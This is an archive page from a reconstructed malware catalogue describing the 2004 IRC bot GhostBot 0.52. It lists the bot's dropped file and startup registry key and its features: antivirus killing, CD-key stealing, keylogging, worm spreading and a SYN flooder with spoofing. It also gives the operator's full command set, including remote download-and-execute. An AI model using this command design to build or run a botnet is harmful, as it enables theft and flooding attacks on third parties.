Archive A Reconstructed © MegaSecurity Database
GhostBot 0.52
Released 22 years, 1 month ago. March 2004
Copyright © MegaSecurity
By Positron
Information
| Field | Value |
| --- | --- |
| Author | Positron |
| Family | GhostBot |
| Category | Remote Access |
| Version | GhostBot 0.52 |
| Release date | Mar 2004, 22 years, 1 month ago. |
Additional Information
GhostBot:
dropped file:
c:\WINDOWS\84Gkbi7V.exe
size: 34.616 bytes
startup:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "AVPTC32"
data: C:\WINDOWS\84Gkbi7V.exe
attempts to connect to an IRC server
tested on Windows XP
13 November 2004
Author Information / Description
;-----------------------------------------------------------------------------------;
; BOT Name: Ghost-BOT 0.52 ;
; --------------------------------------------------------------------------------- ;
; Features: ;
; - SpyBot compatible commands, ;
; - AV/FW killer, ;
; - CD-Key Stealer, ;
; - Mydoom spreader, ;
; - NetBIOS spreader, ;
; - Encrypted strings in EXE, ;
; - Web-server (http://xxx.xxx.xxx.xxx:Port), ;
; - API search engine by CRC32 (used only for important APIs), ;
; - KeyLogger (Keylog file can be download from webserver too), ;
; - P2P spreader (Kazaa, Edonkey, Morpheus, XoloX, ShareAza, LimeWire), ;
; - Prepend all .exe files in shared dirs if they are smaller than 5MB, ;
; - Support DCC SEND, DCC GET, DCC CHAT and topic commands. ;
;-----------------------------------------------------------------------------------;
COMMANDS LIST: (Note: Only the "login" command is case sensitive)
--------------
login password (example: login hello)
delete [filename] (example: delete c:\windows\temp.exe)
execute [filename] (example: delete c:\windows\temp.exe)
rename [originalfile] [newfile] (example: rename c:\windows\temp.exe c:\windows\driver.exe)
makedir [dirname] (example: makedir c:\test\)
info (info: gives some info)
killprocess [processname] (example: killprocess mcafee.exe)
disconnect [sec.] (info: disconnects the bot for x sec.; if sec. is not given, it disconnects the bot for 30 mins.)
quit (info: bot quits running)
download [url] [filename] (example: download http://127.0.0.1/server.exe c:\driver.exe)
httpserver [Port] [root-dir] (example: httpserver 81 c:\)
listprocesses (info: lists all running processes)
op
get [filename] (example: get c:\command.com will trigger a dcc send on the remote pc)
raw [raw command] (example: raw PRIVMSG #ghostbot :hello)
list [path+filter] (example: list c:\*.*)
cdkeys (info: searches for CD-Keys on the server's computer)
restart (info: restarts the server's computer)
shutdown (info: shuts down the server's computer)
ipscan [StartIP] [port] (example: ipscan 1.1.1.1 3137)
stopipscan (info: stops the IP scanner)
uninstall (info: remove BOT)
startmydoom (info: restart MyDoom spreader)
stopmydoom (info: stop MyDoom spreader)
startavfwkiller (info: restart AV/FW killer)
stopavfwkiller (info: stop AV/FW killer)
starnetbios (info: (re)start netbios spreader)
stopnetbios (info: stop netbios spreader)
clone [srv.] [port] [chan] [number of clones] (example: clone 1.1.1.1 6667 #abc 4)
rawclones [command] (example: rawclones PRIVMSG #ABCD :hello ; info: some servers do not allow more than 1 clone)
killclones (info: remove all clones)
stopsyn (info: stop syn flooder)
update [URL] (example: update www.nasa.gov\1.exe)
Syn Flooder command
-------------------
syn [victim] [options]
Options:
-S: Spoof host (0 is random (default))
-p: Separated list of dest ports (0 is random (default))
-s: Separated list of src ports (0 is random (default))
-n: Number of packets (0 is continuous (default))
-d: Delay (in ms) (default 0)
Example I: syn www.kazaa.com -p 21,23,80,110
On this attack:
- Victim: www.kazaa.com
- Source IP: Random
- Destination ports: 21 + 23 + 80 + 110
- Source ports: Random
- Count: Continuous
- Delay: 0 ms (no delay between packets)
Example II: syn www.kazaa.org -S www.edonkey.com -p 21,80 -s 42,63 -n 1 -d 50
On this attack:
- Victim: www.kazaa.com
- Source IP/host: www.edonkey.com
- Destination ports: 21 + 80
- Source ports: 42 + 63
- Count: 1
* Please note that 1 count will send the syn packets from every source port to every destination port. This means 4 packets will be transmitted with a 1 count on this attack. *
- Delay: 50 ms
Positron
This archive is an almost-complete reconstruction of the legendary Mega Security (also known as Kobayashi), a premier 90s-era "Trojan Database" where malware authors once showcased their work. After a decade offline, the site was brought back in August 2024 by its original creator, MasterRat, who authorized me to host this modernized, searchable version of the collection. While the original site remains available for those seeking a nostalgic, old-school experience, we are proud to continue its legacy here. Full credit and thanks go to MasterRat and the retired Mega Security staff for their years of dedicated work in cataloging these historical samples.